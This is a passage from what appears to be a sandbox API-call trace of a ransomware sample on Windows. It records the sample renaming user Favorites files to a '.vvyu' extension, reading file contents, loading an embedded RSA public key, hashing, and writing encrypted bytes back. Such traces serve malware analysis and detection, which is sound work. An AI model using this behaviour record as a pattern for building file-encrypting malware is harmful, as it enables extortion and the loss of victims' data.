Size=0xa0) returned 0x33f3b0 [0193.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x2af3f88 [0193.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0193.160] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\ie site on microsoft.com.url.vvyu")) returned 1 [0193.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0193.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0193.161] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edcf8 | out: hHeap=0x2c0000) returned 1 [0193.164] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee55be0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0193.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x29edcf8 [0193.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.165] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned=".url" [0193.165] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0193.165] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=133) returned 1 [0193.165] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0193.168] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.168] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0193.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0193.170] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.170] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x85, lpOverlapped=0x0) returned 1 [0193.170] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0193.170] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.170] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.170] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0193.171] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0193.171] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.171] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0193.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0193.171] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0193.171] GetLastError () returned 0x0 [0193.172] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0193.172] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0193.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0193.172] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0193.172] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0193.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0193.172] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0193.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0193.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0193.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0193.173] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0193.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0193.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0193.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0193.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0193.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3d68 [0193.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6248 [0193.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3db0 [0193.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6260 [0193.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6290 [0193.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62f0 [0193.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62a8 [0193.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0193.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0193.174] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0193.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0193.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6290 | out: hHeap=0x2c0000) returned 1 [0193.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62a8 | out: hHeap=0x2c0000) returned 1 [0193.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62f0 | out: hHeap=0x2c0000) returned 1 [0193.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0193.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0193.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62f0 [0193.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0193.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae62a8 [0193.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0193.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6290 [0193.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0193.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0193.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0193.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0193.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0193.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0193.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0193.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0193.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0193.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62a8 | out: hHeap=0x2c0000) returned 1 [0193.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0193.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6290 | out: hHeap=0x2c0000) returned 1 [0193.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0193.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0193.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62f0 | out: hHeap=0x2c0000) returned 1 [0193.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0193.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0193.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0193.176] GetCurrentThreadId () returned 0x5d8 [0193.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0193.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae78d8 [0193.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0193.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0193.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0193.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0193.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0193.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0193.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0193.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0193.177] GetCurrentThreadId () returned 0x5d8 [0193.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0193.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0193.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0193.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0193.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0193.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0193.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0193.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0193.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0193.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0193.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40210 [0193.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0193.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0193.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0193.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62f0 [0193.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0193.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0193.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0193.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0193.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0193.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0193.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0193.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0193.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6290 [0193.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0193.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0193.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0193.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0193.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0193.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0193.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0193.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae62a8 [0193.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0193.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0193.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0193.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6278 [0193.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0193.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6308 [0193.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0193.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0193.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0193.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62d8 [0193.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0193.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62c0 [0193.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0193.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6320 [0193.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62c0 | out: hHeap=0x2c0000) returned 1 [0193.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae62c0 [0193.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62d8 | out: hHeap=0x2c0000) returned 1 [0193.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0193.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0193.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0193.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0193.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0193.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6290 | out: hHeap=0x2c0000) returned 1 [0193.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6290 [0193.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0193.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0193.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62f0 | out: hHeap=0x2c0000) returned 1 [0193.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0193.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6320 | out: hHeap=0x2c0000) returned 1 [0193.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0193.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0193.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0193.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0193.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0193.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6290 | out: hHeap=0x2c0000) returned 1 [0193.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0193.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0193.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0193.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0193.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0193.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0193.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0193.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0193.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0193.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0193.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0193.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0193.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0193.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62c0 | out: hHeap=0x2c0000) returned 1 [0193.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0193.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6308 | out: hHeap=0x2c0000) returned 1 [0193.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0193.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62a8 | out: hHeap=0x2c0000) returned 1 [0193.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6278 | out: hHeap=0x2c0000) returned 1 [0193.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0193.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0193.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0193.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6260 | out: hHeap=0x2c0000) returned 1 [0193.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3db0 | out: hHeap=0x2c0000) returned 1 [0193.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0193.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0193.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0193.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0193.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0193.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0193.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0193.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0193.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0193.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0193.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0193.188] WriteFile (in: hFile=0x584, lpBuffer=0x2adfe08*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2adfe08*, lpNumberOfBytesWritten=0x2f9fb14*=0x80, lpOverlapped=0x0) returned 1 [0193.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 